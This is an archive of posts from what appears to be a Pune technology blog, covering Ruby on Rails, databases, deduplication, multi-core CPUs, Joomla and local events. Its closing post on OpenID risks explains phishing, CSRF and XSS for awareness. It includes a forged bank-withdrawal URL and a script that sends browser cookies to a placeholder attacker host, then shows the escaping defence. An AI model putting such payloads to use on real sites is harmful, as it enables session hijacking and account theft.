Category Archives: Technology

Why you need to learn Ruby and Rails


With increasing visibility for the Ruby programming language, and the passion that people show for Ruby-on-Rails for web development, we felt we would like to delve a little into what makes Ruby so cool and Rails so hot. Especially in light of the fact that Ruby Fun Day is happening in Pune on Saturday, we wanted to give our readers a feel for why they should consider attending Ruby Fun Day. With that in mind, we invited Nick Adams of Entrip and SapnaSolutions (both companies use Ruby-on-Rails as a cornerstone of their offerings) to tell us why Ruby, and why Rails.

Ruby is an interpreted language like Python, PHP, Perl, and a whole host of other popular Unix-based languages. It was created in Japan by Yukihiro Matsumoto in the mid-1990s. However, it only shot to fame in the last few years, when the web development world started getting very excited about a new framework called ‘Ruby on Rails’, which arrived in 2005. But I’m getting ahead of myself. First, I’ll look at Ruby in its own right. Then, we’ll take a look at Rails and what’s cool about it.
The first thing you’ll notice about Ruby is its beautifully easy syntax:
5.times { print "Hello Pune!" } 
Goodbye to semicolons, variable declarations and the like: it makes for readable code while ensuring you don’t spend more time coding than you need to. Ruby is 100% object-oriented; in fact, everything in Ruby, including the values held in variables, is an object. That can be a little overwhelming at first, but it begins to make sense as you use a framework like Rails, and it really reveals its true power when you want to change or add to the core ‘String’ class on the fly. It means, in basic speak, that Ruby is very flexible. But there is more. Ruby has cool features like blocks and iterators, and a wealth of all the expected higher-level language features, like the ‘capitalize’ and ‘reverse’ methods for strings.
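
To make that concrete, here is a minimal sketch of blocks, iterators and “open classes” in Ruby. The ‘shout’ method is purely illustrative, not part of Ruby’s standard library:

# Blocks and iterators: pass a chunk of code to a method.
[1, 2, 3].each { |n| puts n * 10 }

# Reopening the core String class on the fly ("open classes").
class String
  def shout
    upcase + "!"
  end
end

puts "hello pune".shout    # => HELLO PUNE!
puts "Pune".reverse        # built-in higher-level methods...
puts "pune".capitalize     # ...like reverse and capitalize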

Rails is of course a web development framework. It is important not to see Rails as simply a collection of new classes and methods designed to aid web development. There are two things that I believe are important to understand before you dive into Rails. One is the MVC pattern of design. The MVC pattern separates application logic into distinct parts, making development fast, but also scalable and logical. The second is the Rails conventions. Although sometimes ambiguous and debated, sticking to the basic Rails conventions and understanding how the framework is designed to work will greatly aid collaboration and the future-proofing of your app.
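
As a rough sketch of what those conventions look like in practice (this assumes an existing Rails project; the Post/PostsController names are illustrative, not from the article): a ‘Post’ model maps by convention to a ‘posts’ database table, and a controller action hands data to a view template of the same name.

# app/models/post.rb -- the Model: data and business rules
class Post < ActiveRecord::Base
  validates_presence_of :title
end

# app/controllers/posts_controller.rb -- the Controller: ties a request to data
class PostsController < ApplicationController
  def index
    @posts = Post.all   # handed to the view below
  end
end

# app/views/posts/index.html.erb -- the View (ERB template):
#   <% @posts.each do |post| %><h2><%= post.title %></h2><% end %>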

What’s so cool about Rails? I recently interviewed someone who has worked in Java, PHP and Rails for web development. I could sense his passion to work for a company that specialises in Rails, and didn’t need to ask why. If you have ever built a web application in .NET, Java, or PHP, you’ll really appreciate the power of Rails. It’s fast, modular, and working in Ruby is fun because you create clean, readable code. It’s free. Ajax and Web 2.0 style features are easy. Fully unit testing your app is easy. Roll out new ideas in weeks instead of months. Setup is easy in any environment, but being open source it favours ’nix-based environments like Linux and Mac.
It all sounds great, doesn’t it? I would advise, however, that Rails is best understood by those who already have an understanding of the web and of building database-driven web applications. Rails is a framework built on long-standing notions; it’s not a magical new web development language. It makes what already exists much easier and faster. Understand the web. Understand web applications. Understand MVC. Then learn Rails, and you’ll never look back!

About the Author – Nick Adams

Nick Adams is the co-founder of Entrip, an integrated travel utility that gives you a map-based interface to plan your trip, capture your experiences in multimedia, and share them with friends. SapnaSolutions is the Ruby on Rails development company behind Entrip. They make web apps for clients and develop in-house products. He can be reached at nick [at] entrip [dot] com

Should you use a file-system or a database

Whether to use a file-system or a database to store the data of your application has been a contentious issue since the 80s. It was something we worried about even when I was doing my Ph.D. in Databases in the 90s. Now Jaspreet Singh, of Pune-based startup Druvaa has weighed in on this issue on Druvaa’s blog. His post is republished here with permission.

This topic has been on my plate for some time now. It’s interesting to see how databases have come a long way and have clearly overshadowed file-systems for storing structured or unstructured information.

Technically, both of them support the basic features necessary for data access. For example, both of them provide –

  • Data management to ensure its integrity and quality
  • Shared access by a community of users
  • Use of a well-defined schema for data access
  • Support for a query language

But file-systems seriously lack some of the critical features necessary for managing data. Let’s take a look at some of these features.

Transaction support
Atomic transactions guarantee complete failure or success of an operation. This is especially needed when there is concurrent access to the same data-set. This is one of the basic features provided by all databases.

But most file-systems don’t have this feature. Only the lesser-known file-systems – Transactional NTFS (TxF), Sun ZFS and Veritas VxFS – support it. Most of the popular open-source file-systems (including ext3, xfs, reiserfs) are not even POSIX compliant.
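
As a minimal sketch of the difference, assuming Ruby’s sqlite3 gem is installed (the table and file names are made up for illustration): the database either applies both updates or neither, while the two plain file writes have no such guarantee.

require "sqlite3"

db = SQLite3::Database.new("accounts.db")
db.execute("CREATE TABLE IF NOT EXISTS accounts (name TEXT, balance INTEGER)")

# Atomic: either both updates happen, or neither does.
db.transaction do
  db.execute("UPDATE accounts SET balance = balance - 100 WHERE name = 'alice'")
  db.execute("UPDATE accounts SET balance = balance + 100 WHERE name = 'bob'")
end

# No such guarantee here: if the process dies between these two writes,
# the data is left half-updated.
File.open("alice.txt", "w") { |f| f.write("900") }
File.open("bob.txt", "w")   { |f| f.write("1100") }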

Fast Indexing
Databases allow indexing based on any attribute or data property (i.e. SQL columns). This enables fast retrieval of data based on the indexed attribute. This functionality is not offered by most file-systems, i.e. you can’t quickly find “all files created after 2 PM today”.

Desktop search tools like Google Desktop or Mac Spotlight offer this functionality, but to do so they have to scan and index the complete file-system and store the information in an internal relational database.
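
A small sketch of the contrast, again with Ruby’s sqlite3 gem and made-up table and directory names: with an index on a timestamp column the “after 2 PM” query is a quick lookup, while on a plain file-system the only option is to walk and stat every file.

require "sqlite3"
require "find"

db = SQLite3::Database.new("catalog.db")
db.execute("CREATE TABLE IF NOT EXISTS files (path TEXT, created_at INTEGER)")
db.execute("CREATE INDEX IF NOT EXISTS idx_created ON files (created_at)")

two_pm = Time.now.to_i - 3 * 3600   # placeholder cut-off time
recent = db.execute("SELECT path FROM files WHERE created_at > ?", [two_pm])

# The file-system way: scan everything under an illustrative directory.
Find.find("/data") do |p|
  puts p if File.file?(p) && File.ctime(p).to_i > two_pm
end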

Snapshots
A snapshot is a point-in-time copy/view of the data. Snapshots are needed by backup applications, which need consistent point-in-time copies of data.

Transactional and journaling capabilities enable most databases to offer snapshots without stopping access to the data. Most file-systems, however, don’t provide this feature (ZFS and VxFS being the only exceptions). Backup software has to depend on either the running application or the underlying storage for snapshots.

Clustering
Advanced databases like Oracle (and now MySQL) also offer clustering capabilities. The “g” in “Oracle 11g” actually stands for “grid”, i.e. clustering capability. MySQL offers shared-nothing clusters using synchronous replication. This helps databases scale up and support larger and more fault-tolerant production environments.

File systems still don’t support this option 🙁  The only exceptions are Veritas CFS and GFS (Open Source).

Replication
Replication is a commodity feature with databases and forms the basis of disaster-recovery plans. File-systems still have to evolve to handle it.

Relational View of Data
File systems store files and other objects only as a stream of bytes, and have little or no information about the data stored in the files. Such file systems also provide only a single way of organizing the files, namely via directories and file names. The associated attributes are also limited in number, e.g. type, size, author, creation time, etc. This does not help in managing related data, as disparate items do not have any relationships defined.

Databases, on the other hand, offer easy means to relate stored data. They also offer a flexible query language (SQL) to retrieve it. For example, it is possible to query a database for “contacts of all persons who live in Acapulco and sent emails yesterday”, but impossible in the case of a file-system.
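
For illustration, here is roughly what such a query looks like in SQL, run from Ruby with the sqlite3 gem; the persons/emails schema is invented for the example.

require "sqlite3"

db = SQLite3::Database.new(":memory:")
db.execute("CREATE TABLE persons (id INTEGER, name TEXT, city TEXT)")
db.execute("CREATE TABLE emails  (sender_id INTEGER, sent_at TEXT)")

# "Contacts of all persons who live in Acapulco and sent emails yesterday"
rows = db.execute(<<-SQL)
  SELECT p.name
  FROM persons p
  JOIN emails e ON e.sender_id = p.id
  WHERE p.city = 'Acapulco'
    AND e.sent_at >= date('now', '-1 day')
SQL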

File-systems need to evolve and provide capabilities to relate different data-sets. This will help the application writers to make use of native file-system capabilities to relate data. A good effort in this direction was Microsoft WinFS.

Conclusion

The only disadvantage of using a database as the primary storage option seems to be the additional cost associated with it. But I see no reason why file-systems won’t, in future, borrow these features from databases.

Disclosure

Druvaa inSync uses a proprietary file-system to store and index the backed-up data. The meta-data for the file-system is stored in an embedded PostgreSQL database. The database-driven model was chosen to store additional identifiers with each block – size, hash and time. This helps the file-system to –

  1. Divide files into variable sized blocks
  2. Data deduplication – Store single copy of duplicate blocks
  3. Temporal File-system – Store time information with each block. This enables faster time-based restores.

Understanding Data De-duplication

Druvaa is a Pune-based startup that sells fast, efficient, and cheap backup (Update: see the comments section for Druvaa’s comments on my use of the word “cheap” here – apparently they sell even in cases where their product is priced above the competing offerings) software for enterprises and SMEs. It makes heavy use of data de-duplication technology to deliver on the promise of speed and low-bandwidth consumption. In this article, reproduced with permission from their blog, they explain what exactly data de-duplication is and how it works.

Definition of Data De-duplication

Data deduplication or Single Instancing essentially refers to the elimination of redundant data. In the deduplication process, duplicate data is deleted, leaving only one copy (single instance) of the data to be stored. However, indexing of all data is still retained should that data ever be required.

Example
A typical email system might contain 100 instances of the same 1 MB file attachment. If the email platform is backed up or archived, all 100 instances are saved, requiring 100 MB of storage space. With data deduplication, only one instance of the attachment is actually stored; each subsequent instance is just referenced back to the one saved copy, reducing the storage and bandwidth demand to only 1 MB.
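
A minimal sketch of the idea in Ruby: key each attachment by a hash of its content, store the bytes only the first time that hash is seen, and keep lightweight references for the rest.

require "digest"

store = {}    # content hash => stored data (the single instances)
refs  = []    # one reference per logical copy

attachments = ["the same 1 MB attachment"] * 100   # 100 identical copies

attachments.each do |data|
  key = Digest::SHA256.hexdigest(data)
  store[key] ||= data    # stored only the first time this hash is seen
  refs << key
end

puts store.size   # => 1    physical copy
puts refs.size    # => 100  logical references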

Technological Classification

The practical benefits of this technology depend upon various factors like –

  1. Point of Application – Source Vs Target
  2. Time of Application – Inline vs Post-Process
  3. Granularity – File vs Sub-File level
  4. Algorithm – Fixed size blocks Vs Variable length data segments

A simple relation between these factors can be explained using the diagram below –

Deduplication Technological Classification

Target Vs Source based Deduplication

Target-based deduplication acts on the target data storage media. In this case the client is unmodified and not aware of any deduplication. The deduplication engine can be embedded in the hardware array, which can be used as a NAS/SAN device with deduplication capabilities. Alternatively, it can be offered as an independent software or hardware appliance which acts as an intermediary between the backup server and the storage arrays. In both cases it improves only storage utilization.

Target Vs Source Deduplication

Source-based deduplication, on the contrary, acts on the data at the source before it is moved. A deduplication-aware backup agent is installed on the client, which backs up only unique data. The result is improved bandwidth and storage utilization. But this imposes additional computational load on the backup client.

Inline Vs Post-process Deduplication

In target-based deduplication, the deduplication engine can process data for duplicates either in real time (i.e. as and when it is sent to the target) or after it has been stored in the target storage.

The former is called inline deduplication. The obvious advantages are –

  1. Increase in overall efficiency as data is only passed and processed once
  2. The processed data is instantaneously available for post-storage processes like recovery and replication, reducing the RPO and RTO windows.

The disadvantages are –

  1. Decrease in write throughput
  2. Extent of deduplication is lower – only the fixed-length block deduplication approach can be used

Inline deduplication processes only incoming raw blocks and does not have any knowledge of the files or file structure. This forces it to use the fixed-length block approach (discussed in detail later).

Inline Vs Post Process Deduplication

Post-process deduplication acts asynchronously on the stored data, and its advantages and disadvantages are exactly the opposite of those of inline deduplication listed above.

File vs Sub-file Level Deduplication

The duplicate-removal algorithm can be applied at the full-file or sub-file level. Full-file duplicates can be easily eliminated by calculating a single checksum of the complete file data and comparing it against the existing checksums of already backed-up files. It’s simple and fast, but the extent of deduplication is quite limited, as it does not address the problem of duplicate content found inside different files or data-sets (e.g. emails).

The sub-file level deduplication technique breaks the file into smaller fixed- or variable-size blocks, and then uses a standard hash-based algorithm to find similar blocks.
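
A hedged sketch of the two granularities (the path and block size are illustrative): one checksum for the whole file versus one checksum per fixed-size block.

require "digest"

path  = "backup/report.doc"   # illustrative file
BLOCK = 64 * 1024             # illustrative block size

# Full-file level: a single changed byte makes the whole file look new.
whole_file_key = Digest::SHA256.file(path).hexdigest

# Sub-file level (fixed-size blocks): unchanged blocks can still be matched.
block_keys = []
File.open(path, "rb") do |f|
  while (chunk = f.read(BLOCK))
    block_keys << Digest::SHA256.hexdigest(chunk)
  end
end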

Fixed-Length Blocks v/s Variable-Length Data Segments

The fixed-length block approach, as the name suggests, divides files into blocks of a fixed size and uses a simple checksum-based approach (MD5/SHA etc.) to find duplicates. Although it’s possible to look for repeated blocks, the approach provides very limited effectiveness. The reason is that the primary opportunity for data reduction is in finding duplicate blocks in two transmitted datasets that are made up mostly – but not completely – of the same data segments.

Data Sets and Block Alignment

For example, similar data blocks may be present at different offsets in two different datasets. In other words, the block boundaries of similar data may be different. This is very common when some bytes are inserted into a file: when the changed file is processed again and divided into fixed-length blocks, all blocks after the insertion point appear to have changed.

Therefore, two datasets with a small amount of difference are likely to have very few identical fixed length blocks.

Variable-Length Data Segment technology divides the data stream into variable length data segments using a methodology that can find the same block boundaries in different locations and contexts. This allows the boundaries to “float” within the data stream so that changes in one part of the dataset have little or no impact on the boundaries in other locations of the dataset.
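
To show the “floating boundary” idea, here is a toy sketch in Ruby. Real systems use a rolling hash such as Rabin fingerprinting; the window-sum condition below is only a stand-in, but it illustrates how content-chosen boundaries let most chunk hashes survive a byte insertion.

require "digest"

WINDOW = 16
MASK   = (1 << 8) - 1    # toy setting: a boundary roughly every 256 bytes

def chunks(bytes)
  out, start = [], 0
  bytes.each_index do |i|
    window = bytes[[0, i - WINDOW + 1].max..i]
    if (window.sum & MASK).zero? || i == bytes.length - 1
      out << bytes[start..i].pack("C*")
      start = i + 1
    end
  end
  out
end

srand(42)
original = Array.new(4096) { rand(256) }   # synthetic data stream
shifted  = [7] + original                  # one byte inserted at the front

a = chunks(original).map { |c| Digest::SHA256.hexdigest(c) }
b = chunks(shifted).map  { |c| Digest::SHA256.hexdigest(c) }
puts (a & b).size   # nearly all chunk hashes are shared despite the insertion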

ROI Benefits

Each organization has a certain capacity to generate data. The extent of savings depends upon – though it is not directly proportional to – the number of applications or end users generating data. Overall, the deduplication savings depend upon the following parameters –

  1. No. of applications or end users generating data
  2. Total data
  3. Daily change in data
  4. Type of data (emails/ documents/ media etc.)
  5. Backup policy (weekly-full – daily-incremental or daily-full)
  6. Retention period (90 days, 1 year etc.)
  7. Deduplication technology in place

The actual benefits of deduplication are realized once the same dataset is processed multiple times over a span of time for weekly/daily backups. This is especially true for variable length data segment technology which has a much better capability for dealing with arbitrary byte insertions.

Numbers
While some vendors claim bandwidth/storage savings ratios of 1:300, our customer statistics show that the results are between 1:4 and 1:50 for source-based deduplication.


CSI Pune Lecture: Security Testing Using Models – 16 Jan 6:30pm


What: CSI Pune Lecture on Security Testing Using Models with Prof. Padmanabhan Krishnan, Bond University, Australia.
When: Friday, 16th Jan, 6:30pm-8:30pm
Where: Dewang Mehta Auditorium, Persistent, S.B. Road
Registration and Fees: Free for CSI/ISACA members; Rs. 50 for students & Persistent employees; others Rs. 100. Register at http://csi-pune.org

Details:
In this talk, we present a framework based on model-based testing for security vulnerability testing. Security vulnerabilities are not only related to security functionality at the application level but are also sensitive to implementation details. Thus, traditional model-based approaches, which abstract away implementation details, are by themselves inadequate for testing security vulnerabilities. We demonstrate a framework that retains the advantages of model-based testing while exposing only the details relevant for vulnerability testing.

Our framework has three sub-models: a model or specification of the key aspects of the application, a model of the relevant aspects of the implementation, and a model of the attacker. These three models are then combined to generate test cases. The same approach can also be used to test whether a system meets a privacy policy.

Who Should Attend: Professionals interested in Test Automation and students.

About the Speaker – Padmanabhan Krishnan

Prof. Krishnan is a Professor at the Centre for Software Assurance, School of IT, Bond University, Australia. He also holds a research associate position at the United Nations University, International Institute for Software Technology. He got his BTech from IIT-Kanpur and MS and PhD from the University of Michigan, Ann Arbor. His interests are in model based testing, verification techniques and practical formal methods for software assurance. He has held positions in the USA, Denmark, New Zealand, Germany and Australia.

Update: The slides of the talk are now available.

Security Testing Using Models



Seminar on Understanding Wi-Fi Cyber attacks


What: Free Seminar on Wi-Fi security and understanding wi-fi cyber attacks conducted by AirTight Networks and MCCI
When: Tuesday, Jan 13, 6pm-8:30pm
Where: Hall No. 6 & 7, B Wing, 5th Floor MCCIA Trade Tower, ICC Complex Senapati Bapat Road
Registration and Fees: This seminar is free for all. Register at: http://www.airtightnetworks.com/seminar/mccia.

Details:
WiFi is fast becoming popular in India – among home users, business travelers, and corporates. While WiFi provides the benefits of wireless and mobile access, unsecured WiFi provides an easy target for hit-and-run style attacks allowing hackers to cause severe damage while remaining invisible and undetected. The crimes range from cyber extortion, downloading illegal content, to theft of credit card numbers and other private corporate information. Most importantly, the recent incidents of cyber terrorism in India showed that an unsecured WiFi connection poses danger to national security.

WiFi cyber-attacks can be used to hack into your network to steal confidential data, steal usernames and passwords, steal user identities or to plan terror attacks. Your WiFi network can become a huge liability if not secured properly.

To create public awareness, MCCIA in association with AirTight Networks Pvt. Ltd., the global leader in wireless security, is conducting a free introductory seminar titled “Understanding WiFi Cyber-attacks”.

This seminar will be followed by a panel discussion titled “Legal and Financial Exposure from WiFi Cyber-attacks”. Panel members include top experts such as Deepak Shikarpur, Chairman, IT Committee, MCCIA, Vaishali Bhagwat, Top Cyber-crime Lawyer and Pravin Bhagwat, Wireless Networking Pioneer.

This seminar is free for all. Register at: http://www.airtightnetworks.com/seminar/mccia


Why you should be on Twitter – and how best to use it

This weekend, at Barcamp Pune 5, I gave a presentation targeted towards people who are new to Twitter, or who do not see what the hype is all about. The presentation went into the reasons why people find Twitter so useful and why it’s considered to be the next best thing after email. I also gave tips and tricks on how to use Twitter effectively.

You can view the presentation online via slideshare:

or you can download it in your favourite format: PDF, PowerPoint 2007, PowerPoint 97-2003. Please feel free to download it and forward it to your friends, especially the ones whom you want to convince to start using Twitter.

An Introduction to Joomla! CMS

If you’ve been following the tech scene in Pune, you’d be aware of the tremendous success of PHPCamp Pune, with over 1000 registrants. One thing that quickly became clear during PHPCamp was the interest in having special interest groups for more specialized areas within PHP hacking – specifically OpenSocial, Drupal and Joomla!. To help you stay in touch, we asked Amit Kumar Singh, one of the primary movers behind PHPCamp and behind the Joomla Users Group India, to give our readers an overview of Joomla! – what it is, and why it is so popular. This article is intentionally low-tech at our request, to give people just a quick overview of Joomla!. If you want more details, especially technical deep dives, head over to Amit’s blog, where he often has articles about Joomla!

Have you ever wondered how you can quickly build a website for yourself or your organization? If yes, then read on to find how you can do so.

What is Joomla!

Joomla! is an open-source content management system (CMS), written in PHP, licensed under the GPL and managed by the OSM Foundation.

Joomla is the English spelling of the Swahili word jumla, meaning “all together” or “as a whole”. You can read more about the history of Joomla at Wikipedia.

Well, in one word, the secret to building websites quickly and easily is Joomla!. It takes the pain out of building and maintaining websites. It is designed and built to make managing websites easy for a layman.

Where to use

It can be used to build

  • Personal Websites
  • Company’s Website
  • Small Business Websites
  • NGO Websites
  • Online magazines and publications websites
  • School and colleges Websites

This is basically a list of things that can be done with Joomla out of the box. Some of the core features of Joomla are

  • Article management
  • User registration and contacts
  • Themes
  • Search
  • Polling
  • Language support
  • Messaging
  • News Feeds and advertisement

If you need more, then you can easily extend Joomla to do a lot more things and even use the framework to build some powerful applications. For example, if you want to add additional fields to the user registration form you can use Community Builder; if you want an e-commerce shopping cart you can use VirtueMart; if you want to add a forum you can use Fireboard.

You can also see how others are using Joomla at Joomla sites showcase forum.

How to Extend

For me the best part of using Joomla is that it is very easy to customize and enhance. You can find extensions for your needs by simply looking in the JED (Joomla Extensions Directory); in case your need is really unique, you can extend Joomla to suit your specific needs by writing simple components and modules.

If you get stuck while building something you can always find help from very active and helpful community members either at main Joomla Forum site or at Joomla User Group Pune.

About the Author – Amit Kumar Singh

Amit works as a Technical Architect at Pune IT Labs Pvt Ltd. He considers himself a jack-of-all-trades in technology, trying to master PHP. Along with others, he has started the Joomla! Users Group Pune and is part of the un/organisers for PHPCamp, Barcamp Pune, OpenSocial Developer Garage and JoomlaDay. He has also created open-source plugins for Joomla, WordPress and jQuery.

What is multi-core architecture and why you need to understand it

Dhananjay Nene has just written a brilliant article in which he gives a detailed overview of multi-core architectures for computer CPUs – why they came about, how they work, and why you should care. Yesterday, Anand Deshpande, CEO of Persistent Systems, while speaking at the IndicThreads conference on Java Technologies, exhorted all programmers to understand multi-core architectures and to program to take advantage of the possibilities they provide. Dhananjay’s article is thus very timely, both for junior programmers who wish to understand why Anand attached so much importance to this issue and what they need to do about it, and for managers in infotech who need to understand how to deal with it.

Dhananjay sets the stage with this lovely analogy, in which he compares the CPU of your computer to Superman (Kal-El); multi-core is then explained thus:

One fine morning Kal’s dad Jor-El knocked on your door and announced that Kal had a built in limitation that he was approaching, and that instead of doubling his productivity every year, he shall start cloning himself once each year (even though they would collectively draw the same salary). Having been used to too much of the good life you immediately exclaimed – “But that’s preposterous – One person with twice the standard skill set is far superior to 2 persons with a standard skill set, and many years down the line One person with 64 times the standard skill sets is far far far superior to 64 persons with a standard skill set”. Even as you said this you realised your reason for disappointment and consternation – the collective Kal family was not going to be doing any lesser work than expected but the responsibility of ensuring effective coordination across 64, 128 and 256 Kals now lay upon you the manager, and that you realised was a burden extremely onerous to imagine and even more so to carry. However productive the Kal family was, the weakest link in the productivity was now going to be you the project manager. That in a nutshell is the multicore challenge, and that in a nutshell is the burden that some of your developers shall need to carry in the years to come.

What is to be done? The first step is to understand which programs are well suited to take advantage of a multi-core architecture, and which ones are not:

if Kal had been working on one single super complex project, the task of dividing up the activities across his multiple siblings would be very onerous, but if Kal was working on a large number of small projects, it would be very easy to simply distribute the projects across the various Kal’s and the coordination and management effort would be unlikely to increase much.

Dhananjay goes into more detail on this and many other issues, that I am skimming over. For example:

Some environments lend themselves to easier multi threading / processing and some make it tough. Some may not support multi threading at all. So this will constrain some of your choices and the decisions you make. While Java and C and C++ all support multi threading, it is much easier to build multi threaded programs in Java than in C or C++. While Python supports multi threading, building processes with more than a handful of threads will run into the GIL issue which will limit any further efficiency improvements by adding more threads. Almost all languages will work with multi processing scenarios.
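
To make the threads-versus-processes distinction concrete, here is a small sketch in Ruby (the language used elsewhere on this page); ‘crunch’ is a made-up stand-in for an independent unit of work, and fork requires a Unix-like system.

# A made-up CPU-bound task standing in for one small independent project.
def crunch(n)
  (1..200_000).reduce(:+) + n
end

jobs = (1..8).to_a

# Multi-threading: one process, threads sharing memory. Note that, like
# CPython's GIL, the standard Ruby interpreter has a global lock, so purely
# CPU-bound threads won't spread across cores; I/O-bound work still benefits.
threads = jobs.map { |n| Thread.new { crunch(n) } }
results = threads.map(&:value)

# Multi-processing: one OS process per job, no shared memory to coordinate.
pids = jobs.map { |n| fork { crunch(n) } }
pids.each { |pid| Process.wait(pid) }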

If you are a programmer or a manager of one, you should read the entire article.  In fact, as we mentioned in  a previous PuneTech post (Why Python is better than Java), you should really subscribe to his blog. He writes detailed and insightful articles that, as a techie, you would do well to read. If you are interested in programming languages, I would recommend reading “Contrasting java and dynamic languages”, and “Performance Comparison – C++ / Java / Python / Ruby/ Jython / JRuby / Groovy”. And if you are a blogger, check out his tips for software/programming blogging.

Dhananjay is a Pune-based software engineer with 17 years in the field, passionate about software engineering, programming, design and architecture. For more info, check out his PuneTech wiki profile.

Upcoming conferences and tech events in Pune – Nov/Dec 2008

Idea Camp Pune, 2008. Photo courtesy InsideSocialWeb.com

The next couple of months are going to be rather active in Pune, with a host of really good conferences and events coming up. Some of these are free events, while others have a fee associated with them. We have written about some of them on PuneTech before, while some you’ll be hearing about for the first time. Some of them are for hardcore techies, while others are more tangential. In any case, there is something for everyone in here. Take this opportunity to improve your skills, or improve your business network. Except for power cuts, it is a great time to be a techie in Pune.

Nov 19 CSI Pune Lecture: Data Management for BI : Ashwin Deokar from SAS R&D Pune will talk about issues in data management in Business Intelligence. Free for members & students, Rs. 100 for others, Rs 50 for Persistent employees
Nov 22, 23 Code Camp: 24-hour code camp organized by Pune Linux Users Group. Free: anybody can attend.
Nov 22 Pune OpenCoffee Club Meeting – Pune Startup’s Pain Points : Get together with other startups in the Pune area and discuss solutions to common problems. Free, anybody can attend, no registration required.
Nov 25,26,27 IndicThreads Conference on Java Technologies: 3-day conference on Java; speakers from all over India. Fees range from Rs. 4000 to 8500 depending on various things.
Nov 27, 28 Conference on Advances in Usability Engineering: organized by Viswakarma Institute of Information Technology. Rs 3500 for professionals, Rs. 2000 for academics and Rs. 500 for students.
Nov 27, 28 Wi-Fi Security Training from AirTightNetworks: Airtight Networks has some of the best wi-fi security products in the world, and they have all been developed fully in Pune. Rs. 8000 before 21 Nov, Rs 10000 afterwards
Nov 27 World Usability Day, Pune 2008 (part of the Usability Conference): This event is part of the Usability Engineering conference listed a couple of lines above, but this part of the conference (3pm to 6pm) is free and open to all.
Nov 29 Barcamp Pune 5: If you don’t know what a barcamp is read this to find out and figure out why you should attend.
Dec 4,5,6,7 Pune Design Festival 2008: Fees and registration details not yet available
Dec 06+ ClubHack – 2-day InfoTech Security Conference: One day of presentations on security, and one day of workshops. INR 1000 for talk sessions, INR 1000 for each workshop. On the spot registration INR 1500
Dec 12+ Society of Technical Communication – 2-day conference on technical writing: Fees and registration details not yet available
Dec 17 CSI Pune Lecture: Data Management for BI: next in the Business Intelligence series by SAS R&D India. Fees most likely: Rs. 100 for others, Rs 50 for Persistent employees
Dec 20 OpenSocial Developer Garage: Conference for OpenSocial developers and enthusiasts. This is a free conference, but by invitation only – Register here to be considered for invitation.

And there are some great events in January too.

Did we miss any? Please add them to the common tech events calendar of Pune. Or, send us a mail with details of the event, and we’ll add it.

The Risks with OpenID

A few months ago, PuneTech carried an article by Hemant Kulkarni of Pune-based singleid.net giving an overview of OpenID, an up-and-coming technology that addresses a real pain point for anybody who has used the web – it removes the need to remember different passwords for different sites. This is called single sign-on, or SSO, in security parlance. More importantly, it achieves this with high security, without passwords having to be passed all over the place. Actually, OpenID is much more than this – read the whole article for more details.

Now, Rohit Srivastwa, founder of ClubHack (a group of volunteers dedicated to increasing awareness of security issues in Pune and elsewhere), has created a presentation on the risks associated with OpenID (for more information about Rohit, see his PuneTech wiki profile):

Risks With OpenID


Basically, he points out that a bunch of standard, well-known security attacks (we’ve listed some of them at the end of this article) will also work against your OpenID provider (if you don’t know what provider means in this context, you really should skim that overview article), and that this results in criminals being able to access all your online accounts with the convenience and security of single sign-on provided by OpenID. Not the effect you were trying for, eh?

So what is to be done? This doesn’t mean that OpenID is bad. In fact, it is great and will make online life much easier. All you need to do is be aware of the risks, and be more careful. Specifically, don’t use OpenID or single-sign-on for banks or credit card account access until we tell you otherwise. Always use https. When in doubt, be paranoid – just because you aren’t paranoid, doesn’t mean they aren’t all out to get you. And don’t take any biscuits from strangers (you’ll be surprised how many people do that on Pune-Nashik buses). And get free education on security issues from the activities of ClubHack.

Some background about security attacks

These days, one of the most important (and easiest to fall for) security risks is the possibility of getting phished. A phishing attack is one in which criminals create a website that looks just like some other website (e.g. your bank’s website) and then tricks you into divulging important information (like account number, password etc.) to them.

There are a bunch of other scary attacks possible – man-in-the-middle attack, replay attack, cross-site request forgery, and cross-site scripting attack.

A man-in-the-middle attack is when an evil website sits between you and your bank website. It pulls all information from the bank website and shows it to you – so it looks like the real thing. And it takes inputs (account number, PIN codes etc.) from you and passes them on to the bank site so that it is able to access your account and show you authentic information from your account. However, along the way, it has managed to get access to your account without your knowledge.

A cross-site request forgery is an attack where malicious code to access your bank account is embedded (and hidden) in the webpage of another website – maybe some chat forum that you visit. Here’s an example from Wikipedia:

For example, one user, Bob, might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references a script on Bob’s bank’s website (rather than an image file) – e.g. an image tag whose source URL is really a withdrawal request, something like http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory.

If Bob’s bank keeps his authentication information in a cookie, and if the cookie hasn’t expired, then the attempt by Bob’s browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob’s approval.

A cross-site scripting (XSS) attack, is a vulnerability in which a hacker can inject malicious scripts (i.e. a little program that sits inside your webpage) into otherwise genuine webpages, and hence it is able to do something terrible either to your local computer, or your account.
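
To give a feel for what “injecting a script” means and for the standard defence, here is a small sketch in Ruby; the comment text is invented, and ERB’s escaping helper stands in for whatever your web framework provides.

require "erb"

comment = %q{<script>document.location='http://evil.example/?c='+document.cookie</script>}

# Rendered as-is, the "comment" would run in every visitor's browser.
unsafe_html = "<p>#{comment}</p>"

# HTML-escaped, it is displayed as harmless text instead of being executed.
safe_html = "<p>#{ERB::Util.html_escape(comment)}</p>"
puts safe_html
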

Note: these exploits are not specific to OpenID. These are well-known attacks that are used all over the web in all kinds of situations. Wikipedia claims that 68% of all websites are vulnerable to XSS attacks. If you are now afraid of using your computer, shouldn’t even read this article that gives an idea of how the underground hacker economy works. But do contact ClubHack to get yourself educated on basic security hygiene. To paraphrase QuickHeal‘s marketing message, aap ke PC meiN kauN rehta hai? Hacker ya ClubHack? (Incidentally, QuickHeal happens to be a Pune-based company, which is giving multi-nationals like Symantec a run for their money (incidentally, Symantec happens to have its largest R&D center in Pune (incidentally, did you notice that Pune is a very happening place technologically? (incidentally, I think you should let everybody know about how happening a place Pune is (technologically speaking) by asking them to subscribe to PuneTech)))).